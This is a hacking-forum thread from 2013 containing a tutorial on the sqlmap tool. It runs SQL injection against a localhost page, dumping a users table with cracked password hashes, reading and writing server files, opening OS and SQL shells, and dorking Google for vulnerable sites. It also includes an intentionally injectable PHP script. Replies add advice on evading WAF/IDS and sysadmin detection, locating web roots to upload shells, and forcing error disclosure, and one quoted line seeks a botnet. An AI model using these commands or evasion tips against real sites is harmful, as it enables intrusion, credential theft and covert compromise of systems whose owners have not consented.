Author Topic: [tut] Sqlmap  (Read 12826 times)

0 Members and 1 Guest are viewing this topic.

Offline relax

  • Sir
  • ***
  • Posts: 562
  • Cookies: 114
  • The one and only
    • View Profile
[tut] Sqlmap
« on: April 05, 2013, 09:52:13 pm »
Now when Evilzine first issue is released I thought I could post my sqlmap tut here to get comments on it


SQLMAP; by relax

 
Rank on sectools.org:30
Work on:Windows, Mac and Linux
Programmed in:Python
Price:free
Homepage:http://sqlmap.org/
Github:https://github.com/sqlmapproject/sqlmap
Wiki:https://github.com/sqlmapproject/sqlmap/wiki
 


Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program and nether do I “relax”.

Now with that said, let's start shall we? :D

Sqlmap is one of the best automated sql-injection tools out there, if not THE best.
It's an open source, python project that can do in seconds what takes a human minutes or hours if it's even possible to do.

Sqlmap has support for
  • MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,
    SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
I personally don't know Sqlmap that well except for some of the standard features and basic usage, but I
will try to give my view of it.
There are also different ways of using this tool depending on how well you know it,
how much noise you want to make, and how big the database is.

A good thing to remember is that all logs and database entries are saved in your output folder within your
Sqlmap folder.



Now lets boot up Sqlmap and look at the basics.

first of we need to know what databases there are for us to explore
Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" –dbs –dbms=mysql

tip:
Code: [Select]
  --threads=1
  If you want to send more requests at the same time this is faster but it needs a good connection.

  --technique=BEUSTQ
  If you don't want to test all techniques because of noise or other reason.


  If nothing is found you can try to increase:
  --level=(1-5)
  --risk=(0-3)


The output tells us that that the site is vulnerable to:
boolean-based blind, error-based and union query and/or time-based blind sql-injection.

Quote
available databases [4]:
    information_schema
    mysql
    performance_schema
    vurln


vurln is the one we will explore to get some passwords from the awesome site 127.0.0.1 ^.^

Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln –tablesOutput:
Quote
Database: vurln
[1 table]
+-------+
| users |
+-------+

Quote
./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –col
Output:
Quote
Database: vurln
Table: users
[3 columns]
+----------+-------------+
| Column      Type            |
+----------+-------------+
| ID            | tinyint(4)     |
| password | varchar(32) |
| username | varchar(20) |
+----------+-------------+

Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –dumpThis will tell us it found possible hashes and will ask if we want to crack them with dictionary attack and
password suffixes, this is a good feature but unfortunately pretty slow, using oclHashcat (gpu cracking)
would go much faster with a lot of entries and word list.

However this awesome site (127.0.0.1) is small so we will go for it.
Output:
Quote
Database: vurln
Table: users
[126 entries]
+-----+-----------+--------------------------------------------------+
| ID    | username | password                                                             |
+-----+-----------+--------------------------------------------------+
| 1      | admin       | 21232f297a57a5a743894a0e4a801fc3 (admin)  |
| 2      | relax         | 098f6bcd4621d373cade4e832627b4f6 (test)     |
| 3      | Tadou       | 253614bbac999b38b5b60cae531c4969 (2012) |
| 4      | Gevoo      | 98b1e16f65a1500023372d2b362c0991              |
| 5      | Beguu      | cff34ad343b069ea6920464ad17d4bcf                 |
[...]



Lets look at some other scenarios.

if this site would use post request instead of get we would specify that:
Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" --dbs
if you want to search for something specific like columns with the name password:
Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --search -C password
File features like:
read:
Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" \ --file-read="/var/www/vurln.php"
Will save the remote file vurln.php locally in your output folder for the domain. And you will need to know
the full path to the file. Look at full path disclosure vulnerability for more info about this.

Write:
Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" \ --file-write "i_was_never_here.txt" --file-dest "/var/www"
Some shell features that are awesome to know:
OS shell:
Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php" –data="user=" –os-shellSql Shell:
Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --sql-shellcheck my old tutorial about uploading sql shell for more information about how to use it
Remember if you can't read/write files with the file features you should try the shell features.

Basic usage of Sqlmap is not harder then that, but just in case you haven't had enough yet, here's some
extra features:

If your not afraid of noise:
Code: [Select]
./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" --exclude-sysdbs –dump-allwill give you everything except system databases in this case “information_schema” and “mysql” database

for the curious user you have:
Code: [Select]
./sqlmap.py -g “inurl:index.php?id=”Google dork - this will find vulnerable site from Google for you, but as stated above this is illegal if you do
not have permission from the site owner and are following all laws.

For the one who wants to be anonymous or extra careful:
Code: [Select]
--proxy=PROXY
--tor=ADDRESS
--tor-port=PORT
--check-waf
--crawl=DEPTH


The vurln.php file for the one who WILL test this legally >.>
Code: (PHP) [Select]
<?php 
if (isset($_POST['user'])) { 
$con =  mysql_connect("localhost""root""password") or die(mysql_error()); 
mysql_select_db("vurln",$con) or die(mysql_error()); 
$results mysql_query("SELECT * FROM users WHERE username='".$_POST['user']."'") or die(mysql_error()); 
if (mysql_num_rows($results) === 0) echo "Theres no user with that ID"; else { 
while($row mysql_fetch_array($results)){ 
echo "The user $row[username] has the ID $row[ID] <hr>";  
    


?>

So what can we say about Sqlmap?
It is a very powerful tool, but like all automatic scanners, it won't find everything, you will have to get your
hands dirty in a lot cases. And it generates a lot of noise if you don't want to get spotted. But it is an
excellent tool that will do work for you that in other cases would take you a lot longer or would be
impossible.


/Relax

Offline vezzy

  • Royal Highness
  • ****
  • Posts: 771
  • Cookies: 172
    • View Profile
Re: [tut] Sqlmap
« Reply #1 on: April 06, 2013, 01:57:20 am »
Not bad. I like your use of practical scenarios. Adds a little touch over the official documentation.

Also, holy shit, Evilzine is out. hhfhgfgdfdhgf
Quote from: Dippy hippy
Just brushing though. I will be semi active mainly came to find a HQ botnet, like THOR or just any p2p botnet

Offline Evilone

  • /dev/null
  • *
  • Posts: 16
  • Cookies: 14
    • View Profile
Re: [tut] Sqlmap
« Reply #2 on: May 09, 2013, 07:22:06 pm »
Please also use --random-agent as it will mask the default user agent which shows up in the apache logs as "SQLmap"; if you don't do this it's pretty trivial to get flagged by WAF/IDS/IPS and it's easy for a sysadmin to see how the attack went down.

Offline relax

  • Sir
  • ***
  • Posts: 562
  • Cookies: 114
  • The one and only
    • View Profile
Re: [tut] Sqlmap
« Reply #3 on: May 09, 2013, 08:03:41 pm »
yeah its a good point, there are even commands to check for waf :P

Offline mrflex

  • NULL
  • Posts: 4
  • Cookies: 2
    • View Profile
Re: [tut] Sqlmap
« Reply #4 on: June 15, 2013, 04:50:41 am »
Thank you very much I have been looking for a good SQLMAP tutorial :)

Offline Sunshie

  • NULL
  • Posts: 1
  • Cookies: -2
    • View Profile
Re: [tut] Sqlmap
« Reply #5 on: August 21, 2013, 03:44:31 am »

Offline AnarchyAngel

  • Peasant
  • *
  • Posts: 50
  • Cookies: 1
  • mmmm beer
    • View Profile
Re: [tut] Sqlmap
« Reply #6 on: August 21, 2013, 03:43:26 pm »
would be nice to see what you do to find web root for uploading shells if there is no path disclosure with sql error output. I usually try looking in http server config files but they can be a bitch to find.
https://dc414.org - MKE area DEFCON group

Offline Stackprotector

  • Administrator
  • Titan
  • *
  • Posts: 2515
  • Cookies: 205
    • View Profile
Re: [tut] Sqlmap
« Reply #7 on: August 27, 2013, 04:18:41 pm »
would be nice to see what you do to find web root for uploading shells if there is no path disclosure with sql error output. I usually try looking in http server config files but they can be a bitch to find.
Try to get another error :). A nice tactic is to supply a array instead of one value in the GET parameters. For example: google.com/?q=lol  to get an error on loads of sites: google.com/?q[]=lol
~Factionwars